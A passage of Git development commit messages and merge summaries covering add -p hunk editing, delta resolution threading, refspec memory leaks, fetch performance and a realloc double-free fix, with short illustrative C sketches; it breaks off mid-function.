Signed-off-by: Junio C Hamano <gitster@pobox.com>
A popular way of partially staging a new file is to run `git add -N
<path>` and then use the hunk editing of `git add -p` to select the
part of the file that the user wishes to stage. Since
85953a3187 ("diff-files --raw: show correct post-image of
intent-to-add files", 2020-07-01) this has stopped working as
intent-to-add paths are now shown as new files rather than changes to
an empty blob and `git apply` refused to apply a creation patch for a
path that was marked as intent-to-add. 7cfde3fa0f ("apply: allow "new
file" patches on i-t-a entries", 2020-08-06) fixed the problem with
apply but it still wasn't possible to edit the added hunk properly.
2c8bd8471a ("checkout -p: handle new files correctly", 2020-05-27)
had previously changed `add -p` to handle new files but it did not
implement patch editing correctly. The perl version simply forbade
editing and the C version opened the editor with the full diff rather
than just the hunk which meant that the user had to edit the hunk
header manually to get it to work.
The root cause of the problem is that added files store the diff header
with the hunk data rather than separating the two as we do for other
changes. Changing added files to store the diff header separately
fixes the editing problem at the expense of having to special case
empty additions as they no longer have any hunks associated with them,
only the diff header.
The changes move some existing code into a conditional, changing the
indentation; they are best viewed with
--color-moved-ws=allow-indentation-change (--ignore-space-change
also works well to get an overview of the changes).
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Reported-by: Thomas Sullivan <tom@msbit.com.au>
Reported-by: Yuchen Ying <ych@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running `git config --worktree` outside of a git repository hits a BUG()
when trying to enumerate the worktrees. Let's catch this error earlier
and die() with a friendlier message.
Signed-off-by: Matheus Tavares <matheus.bernardino@usp.br>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The maintainer's dist rules are used to produce distribution
tarballs. They use "$(TAR) cf" and "$(TAR) rf" to produce archives
out of a freshly created local installation area, which means that
the built product can be affected by maintainer's umask and other
local environment.
Implementations of "tar" have ways (implementation specific,
unfortunately) to force permission bits and other stuff to allow the
user to hide these effects coming from the local environment. Teach
our Makefile to allow the maintainer to tweak the invocation of the
$(TAR) commands by setting TAR_DIST_EXTRA_OPTS.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
0906ac2b (blame: use changed-path Bloom filters, 2020-04-16)
introduced a call to oidcmp() that should have been oideq(), which
was introduced in 14438c44 (introduce hasheq() and oideq(),
2018-08-28).
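To illustrate the difference between the two helpers, here is a minimal sketch using hypothetical `sketch_` names and a fixed 20-byte hash; it assumes the equality helper is simply the negated three-way comparison, and is not the real definition.

```c
#include <string.h>

#define SKETCH_RAWSZ 20   /* hypothetical fixed hash size */

struct sketch_oid {
	unsigned char hash[SKETCH_RAWSZ];
};

/* Three-way comparison: negative, zero, or positive, like memcmp(). */
int sketch_oidcmp(const struct sketch_oid *a, const struct sketch_oid *b)
{
	return memcmp(a->hash, b->hash, SKETCH_RAWSZ);
}

/* Equality test: non-zero when the two ids are identical. */
int sketch_oideq(const struct sketch_oid *a, const struct sketch_oid *b)
{
	return !sketch_oidcmp(a, b);
}
```

When a caller only needs to know whether two ids match, the equality form states that intent directly instead of negating an ordering result.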
Signed-off-by: Edmundo Carmona Antoranz <eantoranz@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, when index-pack resolves deltas, it does not split up delta
trees into threads: each delta base root (an object that is not a
REF_DELTA or OFS_DELTA) can go into its own thread, but all deltas on
that root (direct or indirect) are processed in the same thread.
This is a problem when a repository contains a large text file (thus,
delta-able) that is modified many times - delta resolution time during
fetching is dominated by processing the deltas corresponding to that
text file.
This patch contains a solution to that. When cloning using
git -c core.deltabasecachelimit=1g clone \
https://fuchsia.googlesource.com/third_party/vulkan-cts
on my laptop, clone time improved from 3m2s to 2m5s (using 3 threads,
which is the default).
The solution is to have a global work stack. This stack contains delta
bases (objects, whether appearing directly in the packfile or generated
by delta resolution, that themselves have delta children) that need to
be processed; whenever a thread needs work, it peeks at the top of the
stack and processes its next unprocessed child. If a thread finds the
stack empty, it will look for more delta base roots to push on the stack
instead.
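The stack discipline described above can be sketched single-threaded as follows. All names here (`struct base`, `take_next_child()`, `resolve_all()`, `MAX_STACK`) are hypothetical, delta application is reduced to a counter, and a real multi-threaded version would have to guard every stack access with a mutex.

```c
#include <stddef.h>

#define MAX_STACK 64   /* hypothetical depth limit for this sketch */

/* Hypothetical delta base: an object with delta children to resolve. */
struct base {
	struct base **children;  /* deltas that use this object as their base */
	size_t nr_children;
	size_t next_child;       /* index of the next child not yet handed out */
};

struct work_stack {
	struct base *items[MAX_STACK];
	size_t nr;
};

int push_base(struct work_stack *s, struct base *b)
{
	if (s->nr == MAX_STACK)
		return -1;
	s->items[s->nr++] = b;
	return 0;
}

/*
 * Peek at the top of the stack and hand out its next unprocessed child.
 * Bases whose children have all been handed out are dropped.
 * Returns NULL once the stack is empty.
 */
struct base *take_next_child(struct work_stack *s)
{
	while (s->nr) {
		struct base *top = s->items[s->nr - 1];
		if (top->next_child < top->nr_children)
			return top->children[top->next_child++];
		s->nr--;
	}
	return NULL;
}

/* Returns the number of deltas "resolved", or (size_t)-1 on overflow. */
size_t resolve_all(struct base **roots, size_t nr_roots)
{
	struct work_stack s = { .nr = 0 };
	size_t next_root = 0, resolved = 0;

	for (;;) {
		struct base *child = take_next_child(&s);
		if (!child) {
			/* Stack empty: look for another root to push. */
			if (next_root == nr_roots)
				break;
			push_base(&s, roots[next_root++]);
			continue;
		}
		resolved++;  /* stand-in for applying the delta */
		/* A resolved object with children is itself a delta base. */
		if (child->nr_children && push_base(&s, child) < 0)
			return (size_t)-1;
	}
	return resolved;
}
```

Because each call hands out a single child rather than a whole delta tree, several workers could take children of the same root at the same time, which is the point of the smaller work unit.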
The main weakness of having a global work stack is that more time is
spent in the mutex, but profiling has shown that most time is spent in
the resolution of the deltas themselves, so this shouldn't be an issue
in practice. In any case, experimentation (as described in the clone
command above) shows that this patch is a net improvement.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
REF_LOG_ONLY is used in the transaction preparation: if a symref is involved in
a transaction, the referent of the symref should be updated, and the symref
itself should only be updated in the reflog.
Other ref backends will need to duplicate this logic too, so move it to a
central place.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The "refuse --edit-description on unborn branch for now" test in t3200
switches to an orphan branch, causing subsequent git commands
referencing HEAD to fail. Avoid this side-effect by switching back to
master after the test finishes.
This has gone undetected, as the next affected test expects failure -
but it currently fails for the wrong reason.
Verbose output of the next test referencing HEAD,
"--merged is incompatible with --no-merged":
fatal: malformed object name HEAD
Which this commit corrects to:
error: option `no-merged' is incompatible with --merged
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When formatting a patch series over `origin..HEAD`, one would expect
that range to be used as the current-series-range when computing a
range-diff between the previous and current versions of a patch series.
However, infer_range_diff_ranges() ignores `origin..HEAD` when
--range-diff=<prev> specifies a single revision rather than a range, and
instead unexpectedly computes the current-series-range based upon
<prev>. Address this anomaly by unconditionally using `origin..HEAD` as
the current-series-range regardless of <prev> as long as `origin` is
known, and only fall back to basing current-series-range on <prev> when
`origin` is not known.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To compute and show an interdiff, show_interdiff() needs only the two
OIDs to compare and a diffopts, yet it expects callers to supply an
entire rev_info. The demand for rev_info is not only overkill, but also
places unnecessary burden on potential future callers which might not
otherwise have a rev_info at hand. Address this by tightening its
signature to require only the items it needs instead of a full rev_info.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
show_interdiff() is a relatively small function and not likely to grow
larger or more complicated. Rather than dedicating an entire source file
to it, relocate it to diff-lib.c which houses other "take two things and
compare them" functions meant to be re-used but not so low-level as to
reside in the core diff implementation.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have had parallel implementations of "add -i/-p" since 2.25 and
have been using them from various codepaths since 2.26 days, but
never made the built-in version the default.
We have found and fixed a handful of corner case bugs in the
built-in version, and it may be a good time to start switching over
the user base from the scripted version to the built-in version.
Let's enable the built-in version for those who opt into the
feature.experimental guinea-pig program to give wider exposure.
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
asan reports that the C version of `add -p` is not freeing all the
memory it allocates. Fix this by introducing a function to clear
`struct add_p_state` and use it instead of freeing individual members.
Signed-off-by: Phillip Wood <phillip.wood@dunelm.org.uk>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our color tests of "git add -p" do something a bit different from how a
normal user would behave: we pretend there's a pager in use, so that Git
thinks it's OK to write color to a non-tty stdout. This comes from
8539b46534 (t3701: avoid depending on the TTY prerequisite, 2019-12-06),
which allows us to avoid a lot of complicated mock-tty code.
However, those environment variables also make their way down to
sub-processes of add--interactive, including the "diff-files" we run to
generate the patches. As a result, it thinks it should output color,
too. So in t3701.50, for example, the machine-readable version of the
diff we get unexpectedly has color in it. We fail to parse it as a diff
and think there are zero hunks.
The test does still pass, though, because even with zero hunks we'll
dump the diff header (and we consider those unparseable bits to be part
of the header!), and so the output still has the expected color codes in
it. We don't notice that the command was totally broken and failed to
apply anything.
And in fact we're not really testing what we think we are about the
color, either. While add--interactive does correctly show the version we
got from running "diff-files --color", we'd also pass the test if we had
accidentally shown the machine-readable version, too, since it
(erroneously) has color codes in it.
One could argue that the test isn't very realistic; it's setting up this
"pretend there's a pager" situation to get around the tty restrictions
of the test environment. So one option would be to move back towards
using a real tty. But the behavior of add--interactive really is
user-visible here. If a user, for whatever reason, did run "git
--paginate add --patch" (perhaps because their pager is really a filter
or something), the command would totally fail to do anything useful.
Since we know that we don't want color in this output, let's just make
add--interactive more defensive, and say "--no-color" explicitly. It
doesn't hurt anything in the common case, but it fixes this odd case and
lets our test function properly again.
Note that the C builtin run_add_p() already passes --no-color, so it
doesn't need a similar fix. That will eventually replace this perl code
anyway, but the test change here will be valuable for ensuring that.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
After applying hunks to a file with "add -p", the C patch_update_file()
function tries to refresh the index (just like the perl version does).
We can only refresh the index if we're able to read it in, so we first
check the return value of repo_read_index(). But unlike many functions,
where "0" is success, that function is documented to return the number
of entries in the index. Hence we should be checking for success with a
non-negative return value.
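The difference between the two checks can be sketched like this. The reader function is a hypothetical stand-in that follows the documented convention (entry count on success, negative on failure); it is not the real index-reading code.

```c
/*
 * Hypothetical stand-in for a reader that returns the number of
 * entries on success and a negative value on failure.
 */
int sketch_read_entries(int simulate_failure, int nr_entries)
{
	return simulate_failure ? -1 : nr_entries;
}

/* Check written as if 0 meant success: wrong for any non-empty index. */
int can_refresh_buggy(int ret)
{
	return ret == 0;
}

/* Check matching the documented convention: non-negative is success. */
int can_refresh_fixed(int ret)
{
	return ret >= 0;
}
```

With the first check, the refresh would be skipped whenever the index holds at least one entry, which is almost always the case after staging hunks.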
Neither the tests nor any users seem to have noticed this, probably due
to a combination of:
- this affects only the C version, which is not yet the default
- following it up with any porcelain command like "git diff" or "git
commit" would refresh the index automatically.
But you can see the problem by running the plumbing "git diff-files"
immediately after "add -p" stages all hunks. Running the new test with
GIT_TEST_ADD_I_USE_BUILTIN=1 fails without the matching code change.
Signed-off-by: Jeff King <peff@peff.net>
Acked-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
By default, `git worktree add` creates a new worktree associated with a
particular branch (which may have been created automatically if not
specified explicitly on the command-line). It is also convenient to
create throwaway worktrees not associated with any branch, which can be
handy when making experimental changes or doing testing. However, the
latter use-case may not be obvious to newcomers since the high-level
description of worktrees talks only about checking out "more than one
branch at a time". Therefore, enhance the description to discuss both
use-cases.
A secondary goal of highlighting the distinction between branch-based
and throwaway worktrees is to help newcomers understand that the
simplest form `git worktree add <path>` automatically creates a new
branch. Stating this early in the description may help newcomers avoid
creating branches without realizing they are doing so, and later
wondering why `git branch --list` shows branches the user did not
intentionally create.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Like `git switch` and `git checkout`, `git worktree add` can check out a
branch or set up a detached HEAD. However, unlike those other commands,
`git worktree add` does not understand -d as shorthand for --detach,
which may confound users accustomed to using -d for this purpose.
Address this shortcoming by teaching `add` to recognize -d for --detach,
thus bringing it in line with the other commands.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
`git checkout` learned -d as short option for --detach in 163e3b2975
(switch: add short option for --detach, 2019-03-29) but the
documentation was never updated to reflect the change.
Signed-off-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The argv argument of collect_changed_submodules() contains only object ids
(the object references of all the refs).
Notify setup_revisions() that the input is not filenames by passing
assume_dashdash, so it can avoid redundant stat for each ref.
Also suppress refname_ambiguity flag to avoid filesystem lookups for
each object. Similar logic can be found in cat-file, pack-objects and more.
This change reduces the time for git fetch in my repo from 25s to 6s.
Signed-off-by: Orgad Shaneh <orgads@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call hashwrite_be32() instead of open-coding it. This is shorter and
easier to read.
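As an illustration of what such a helper saves callers from open-coding, here is a minimal sketch. `struct sink`, `sink_write()` and `sink_write_be32()` are hypothetical stand-ins writing to a small in-memory buffer, not the real hashing file API.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical output sink standing in for a hashing file writer. */
struct sink {
	unsigned char buf[64];
	size_t len;
};

/* Append raw bytes; returns 0 on success, -1 if the buffer is full. */
int sink_write(struct sink *s, const void *data, size_t n)
{
	if (n > sizeof(s->buf) - s->len)
		return -1;
	memcpy(s->buf + s->len, data, n);
	s->len += n;
	return 0;
}

/* Helper that hides the big-endian conversion from every caller. */
int sink_write_be32(struct sink *s, uint32_t v)
{
	unsigned char be[4] = {
		(unsigned char)(v >> 24), (unsigned char)(v >> 16),
		(unsigned char)(v >> 8), (unsigned char)v
	};
	return sink_write(s, be, sizeof(be));
}
```

Without the helper, each call site would need its own temporary variable and byte-order conversion before calling the generic write function.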
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Emit byte-sized values using hashwrite_u8() instead of buffering them
locally first. The hashwrite functions already do their own buffering,
so this double-buffering does not reduce the number of system calls.
Getting rid of it shortens and simplifies the code a bit.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Call write_pack_header() to hash and write a pack header instead of
open-coding this function. This gets rid of duplicate code and of the
magic version number 2 -- which has been used here since c90be46abd
(Changed fast-import's pack header creation to use pack.h, 2006-08-16)
and in pack.h (again) since 29f049a0c2 (Revert "move pack creation to
version 3", 2006-10-14).
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a function for building a refspec using printf-style formatting. It
frees callers from managing their own buffer. Use it throughout the
tree to shorten and simplify its callers.
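A printf-style append helper of this kind could look roughly like the sketch below. `struct spec_list` and `spec_list_appendf()` are hypothetical names, and the real function operates on Git's own refspec structure rather than a bare string array.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical minimal list of refspec strings. */
struct spec_list {
	char **items;
	size_t nr;
};

/*
 * Format a refspec printf-style and append it to the list, so the
 * caller never manages a buffer of its own.
 * Returns 0 on success, -1 on formatting or allocation failure.
 */
int spec_list_appendf(struct spec_list *list, const char *fmt, ...)
{
	va_list ap;
	int len;
	char *s, **grown;

	va_start(ap, fmt);
	len = vsnprintf(NULL, 0, fmt, ap);  /* measure the result first */
	va_end(ap);
	if (len < 0)
		return -1;

	s = malloc((size_t)len + 1);
	if (!s)
		return -1;
	va_start(ap, fmt);
	vsnprintf(s, (size_t)len + 1, fmt, ap);
	va_end(ap);

	grown = realloc(list->items, (list->nr + 1) * sizeof(*grown));
	if (!grown) {
		free(s);
		return -1;
	}
	list->items = grown;
	list->items[list->nr++] = s;
	return 0;
}
```

A caller can then write a single line such as `spec_list_appendf(&list, "refs/heads/%s:refs/remotes/%s/%s", branch, remote, branch)` instead of formatting into a temporary buffer, appending it, and releasing the buffer.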
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
map_refspec() either returns the passed in ref string or a detached
strbuf. This makes it hard for callers to release the possibly
allocated memory, and set_refspecs() consequently leaks it.
Let map_refspec() append any refspecs directly and release its own
strbufs after use. Rename it to refspec_append_mapped() and don't
return anything to reflect its increased responsibility.
set_refspecs() also leaks its strbufs. Do the same here and directly
call refspec_append() in each if branch instead of holding onto a
detached strbuf, then dispose of the allocated memory after use. We
need to add an else branch for the final call because all the other
conditional branches already add their formatted refspec now.
setup_push_upstream() and setup_push_current() forgot to release their
strbufs as well; plug these leaks, too, while at it.
None of these leaks were likely to impact users, because the number
and sizes of refspecs are usually small and the allocations are only
done once per program run. Clean them up nevertheless, as another
step on the long road towards zero memory leaks.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
44c7e1a7e0 (mem-pool: use more standard initialization and finalization,
2020-08-15) moved the allocation of the mem-pool structure to callers.
It also added an allocation to load_cache_entries_threaded(), but for an
unrelated mem-pool. Fix that by allocating the correct one instead --
the one that is initialized two lines later.
Reported-by: Sandor Bodo-Merle <sbodomerle@gmail.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Reviewed-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Tools based on LibClang [1] can make use of a 'JSON Compilation
Database' [2] that keeps track of the exact options used to compile a set
of source files.
For example, clangd [3], which is a C language server protocol
implementation, can use a JSON compilation database to determine the
flags needed to compile a file so it can provide proper editor
integration. As a result, editors supporting the language server
protocol (such as VS Code, Emacs, or Vim, with suitable plugins) can
provide better searching, integration, and refactoring tools.
The Clang compiler can generate JSON fragments when compiling [4],
using the `-MJ` flag. These JSON fragments (one per compiled source
file) can then be concatenated to create the compilation database,
commonly called 'compile_commands.json'.
Add support to the Makefile for generating these JSON fragments as well
as the compilation database itself, if the environment variable
'GENERATE_COMPILATION_DATABASE' is set.
If this variable is set, check that $(CC) indeed supports the `-MJ`
flag, following what is done for automatic dependencies.
All JSON fragments are placed in the 'compile_commands/' directory, and
the compilation database 'compile_commands.json' is generated as a
dependency of the 'all' target using a `sed` invocation.
[1] https://clang.llvm.org/docs/Tooling.html
[2] https://clang.llvm.org/docs/JSONCompilationDatabase.html
[3] https://clangd.llvm.org/
[4] https://clang.llvm.org/docs/ClangCommandLineReference.html#cmdoption-clang-mj-arg
Helped-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Get rid of needless check of 'parents' for NULL. The NULL case
is already handled right above, and 'parents' is dereferenced
without check below anyway.
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Handle first_parent_only by breaking from generic loop early
rather than by duplicating (part of) the loop body.
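The shape of this refactoring can be sketched as follows, with a hypothetical parent list and a counter standing in for the real loop body.

```c
#include <stddef.h>

/* Hypothetical singly linked list of parents. */
struct parent_list {
	int id;
	struct parent_list *next;
};

/*
 * Visit parents with one generic loop; when first_parent_only is set,
 * leave the loop after the first iteration instead of duplicating the
 * loop body in a separate branch.
 */
int count_visited_parents(const struct parent_list *parents,
			  int first_parent_only)
{
	int visited = 0;
	const struct parent_list *p;

	for (p = parents; p; p = p->next) {
		visited++;  /* stand-in for the shared loop body */
		if (first_parent_only)
			break;
	}
	return visited;
}
```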
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching recursively with submodules, for each ref in the
superproject, we call check_for_new_submodule_commits() which collects all
the objects that have to be checked for submodule changes on
calculate_changed_submodule_paths(). On the first call, it also collects all
the existing refs for excluding them from the scan.
calculate_changed_submodule_paths() creates an argument array with all the
collected new objects, followed by --not and all the old objects. This argv
is passed to setup_revisions, which parses each argument, converts it back
to an oid and resolves the object. The parsing itself also does redundant
work, because it is treated like user input, while in fact it is a full
oid. So it needlessly attempts to look it up as a ref (checks if it has ^, ~
etc.), checks if it is a file name, and so on.
For a repository with many refs, all of this is expensive. But if the fetch
in the superproject did not update the ref (i.e. the objects that are
required to exist in the submodule did not change), there is no need to
include it in the list.
Before commit be76c212 (fetch: ensure submodule objects fetched,
2018-12-06), submodule reference changes were only detected for refs that
were changed, but not for new refs. That commit also covered the latter
case, but it did so by simply including every ref.
This change should reduce the number of scanned refs by about half (except
the case of a no-op fetch, which will not scan any ref), because all the
existing refs will still be listed after --not.
The regression was reported here:
https://public-inbox.org/git/CAGHpTBKSUJzFSWc=uznSu2zB33qCSmKXM-iAjxRCpqNK5bnhRg@mail.gmail.com/
Signed-off-by: Orgad Shaneh <orgads@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It was possible for xrealloc() to send a non-NULL pointer that has
been freed, which has been fixed.
* jk/xrealloc-avoid-use-after-free:
xrealloc: do not reuse pointer freed by zero-length realloc()
"git diff --stat -w" showed 0-line changes for paths whose changes
were only whitespaces, which was not intuitive. We now omit such
paths from the stat output.
* mr/diff-hide-stat-wo-textual-change:
diff: teach --stat to ignore uninteresting modifications
Updates to on-demand fetching code in lazily cloned repositories.
* jt/lazy-fetch:
fetch: no FETCH_HEAD display if --no-write-fetch-head
fetch-pack: remove no_dependents code
promisor-remote: lazy-fetch objects in subprocess
fetch-pack: do not lazy-fetch during ref iteration
fetch: only populate existing_refs if needed
fetch: avoid reading submodule config until needed
fetch: allow refspecs specified through stdin
negotiator/noop: add noop fetch negotiator
A handful of places in in-tree code still relied on being able to
execute the git subcommands, especially built-ins, in "git-foo"
form, which have been corrected.
* jc/undash-in-tree-git-callers:
credential-cache: use child_process.args
cvsexportcommit: do not run git programs in dashed form
transport-helper: do not run git-remote-ext etc. in dashed form
Trim an unused binary and turn a bunch of commands into built-ins.
* jk/slimmed-down:
drop vcs-svn experiment
make git-fast-import a builtin
make git-bugreport a builtin
make credential helpers builtins
Makefile: drop builtins from MSVC pdb list
Bugfix for "git fetch" when the packfile URI capability is in use.
* jt/fetch-pack-loosen-validation-with-packfile-uri:
fetch-pack: make packfile URIs work with transfer.fsckobjects
fetch-pack: document only_packfile in get_pack()
(various): document from_promisor parameter
Test clean-up.
* ss/t7401-modernize:
t7401: add a NEEDSWORK
t7401: change indentation for enhanced readability
t7401: change syntax of test_i18ncmp calls for clarity
t7401: use 'short' instead of 'verify' and cut in rev-parse calls
t7401: modernize style
"git rebase -i" learns a bit more options.
* pw/rebase-i-more-options:
t3436: do not run git-merge-recursive in dashed form
rebase: add --reset-author-date
rebase -i: support --ignore-date
rebase -i: support --committer-date-is-author-date
am: stop exporting GIT_COMMITTER_DATE
rebase -i: add --ignore-whitespace flag
When a user checks out the upstream branch of HEAD, the upstream branch
not being a local branch, and then runs "git status", like this:
git clone $URL client
cd client
git checkout @{u}
git status
no status is printed, but instead an error message:
fatal: HEAD does not point to a branch
(This error message when running "git branch" persists even after
checking out other things - it only stops after checking out a branch.)
This is because "git status" reads the reflog when determining the "HEAD
detached" message, and thus attempts to DWIM "@{u}", but that doesn't
work because HEAD no longer points to a branch.
Therefore, when calculating the status of a worktree, tolerate dangling
marks. This is done by adding an additional parameter to
dwim_ref() and repo_dwim_ref().
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This makes it clear that dwim_ref() is just repo_dwim_ref() without the
first parameter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In preparation for a future patch adding a boolean parameter to
repo_interpret_branch_name(), which might be easily confused with an
existing unsigned int parameter, refactor repo_interpret_branch_name()
to take an option struct instead of the unsigned int parameter.
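The motivation can be illustrated with a small sketch. The flag names, the struct and its fields are hypothetical, and the rule that an empty mask means "no restriction" is an assumption of this example.

```c
/* Hypothetical flag bits and option struct, for illustration only. */
#define SKETCH_ALLOW_LOCAL  (1u << 0)
#define SKETCH_ALLOW_REMOTE (1u << 1)

struct sketch_interpret_options {
	unsigned allowed;                /* bitmask that used to be a bare parameter */
	unsigned tolerate_dangling : 1;  /* a later boolean gets its own named field */
};

int sketch_is_allowed(const struct sketch_interpret_options *opts,
		      unsigned kind)
{
	/* Assumption of this sketch: an empty mask means "no restriction". */
	return !opts->allowed || (opts->allowed & kind) != 0;
}
```

With named fields, a call site reads as `{ .allowed = SKETCH_ALLOW_LOCAL }`, so a boolean added later cannot be mistaken for the bitmask the way two adjacent integer arguments could be.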
The static function interpret_branch_mark() is also updated to take the
option struct in preparation for that future patch, since it will also
make use of the to-be-introduced boolean parameter.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
887952b8c6 ("fetch: optionally allow disabling FETCH_HEAD update",
2020-08-18) introduced the ability to disable writing to FETCH_HEAD
during fetch, but did not suppress the "<source> -> FETCH_HEAD" message
when this ability is used. This message is misleading in this case,
because FETCH_HEAD is not written. Also, because "fetch" is used to
lazy-fetch missing objects in a partial clone, this significantly
clutters up the output in that case since the objects to be fetched are
potentially numerous.
Therefore, suppress this message when --no-write-fetch-head is passed
(but not when --dry-run is set).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the common case where users have _not_ pushed a `ci-config` branch to
configure which branches should be included in the GitHub workflow runs,
there is a big fat ugly annotation about a failure in the run's log:
X Check failure on line 1 in .github
@github-actions github-actions / ci-config
.github#L1
Process completed with exit code 128.
The reason is that the `ci-config` job tries to clone that `ci-config`
branch, and even if it is configured to continue on error, the
annotation is displayed, and it is distracting.
Let's just handle this on the shell script level, so that the job's step
is not marked as a failure.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The section added in e76eec3554 (ci: allow per-branch config for
GitHub Actions, 2020-05-07) contains a `&&`-chain that connects several
commands. The first command is actually so long that it stretches over
multiple lines, and as per usual, the continuation lines are indented one
more level than the first.
However, the subsequent commands in the `&&`-chain were also indented
one more level than the first command, which was almost certainly
unintended.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Acked-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch fixes a bug where xrealloc(ptr, 0) can double-free and
corrupt the heap on some platforms (including at least glibc).
The C99 standard says of malloc (section 7.20.3):
If the size of the space requested is zero, the behavior is
implementation-defined: either a null pointer is returned, or the
behavior is as if the size were some nonzero value, except that the
returned pointer shall not be used to access an object.
So we might get NULL back, or we might get an actual pointer (but we're
not allowed to look at its contents). To simplify our code, our
xmalloc() handles a NULL return by converting it into a single-byte
allocation. That way callers get consistent behavior. This was done way
back in 4e7a2eccc2 (?alloc: do not return NULL when asked for zero
bytes, 2005-12-29).
We also gave xcalloc() and xrealloc() the same treatment. And according
to C99, that is fine; the text above is in a paragraph that applies to
all three. But what happens to the memory we passed to realloc() in such
a case? I.e., if we do:
ret = realloc(ptr, 0);
and "ptr" is non-NULL, but we get NULL back, is "ptr" still valid? C99
doesn't cover this case specifically, but says (section 7.20.3.4):
The realloc function deallocates the old object pointed to by ptr and
returns a pointer to a new object that has the size specified by size.
So "ptr" is now deallocated, and we must only look at "ret". And since
"ret" is NULL, that means we have no allocated object at all. But that's
not quite the whole story. It also says:
If memory for the new object cannot be allocated, the old object is
not deallocated and its value is unchanged.
[...]
The realloc function returns a pointer to the new object (which may
have the same value as a pointer to the old object), or a null pointer
if the new object could not be allocated.
So if we see a NULL return with a non-zero size, we can expect that the
original object _is_ still valid. But with a zero size, it's
ambiguous. The NULL return might mean a failure (in which case the
object is valid), or it might mean that we successfully allocated
nothing, and used NULL to represent that.
The glibc manpage for realloc() explicitly says:
[...]if size is equal to zero, and ptr is not NULL, then the call is
equivalent to free(ptr).
Likewise, this StackOverflow answer:
https://stackoverflow.com/a/2135302
claims that C89 gave similar guidance (but I don't have a copy to verify
it). A comment on this answer:
https://stackoverflow.com/a/2022410
claims that Microsoft's CRT behaves the same.
But our current "retry with 1 byte" code passes the original pointer
again. So on glibc, we effectively free() the pointer and then try to
realloc() it again, which is undefined behavior.
The simplest fix here is to just pass "ret" (which we know to be NULL)
to the follow-up realloc(). But that means that a system which _doesn't_
free the original pointer would leak it. It's not clear if any such
systems exist, and that interpretation of the standard seems unlikely
(I'd expect a system that doesn't deallocate to simply return the
original pointer in this case). But it's easy enough to err on the safe
side, and just never pass a zero size to realloc() at all.
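The "never pass a zero size" approach can be sketched as below. The `sketch_` names are hypothetical and the error handling is simplified to printing a message and exiting; this shows the idea rather than the exact wrapper code.

```c
#include <stdio.h>
#include <stdlib.h>

/* Allocate at least one byte so callers never see NULL for size 0. */
void *sketch_xmalloc(size_t size)
{
	void *ret = malloc(size ? size : 1);
	if (!ret) {
		fprintf(stderr, "out of memory\n");
		exit(1);
	}
	return ret;
}

/*
 * Never hand a zero size to realloc(): free the old block ourselves
 * and return a fresh minimal allocation instead. This avoids relying
 * on what realloc(ptr, 0) does to "ptr" on a given platform.
 */
void *sketch_xrealloc(void *ptr, size_t size)
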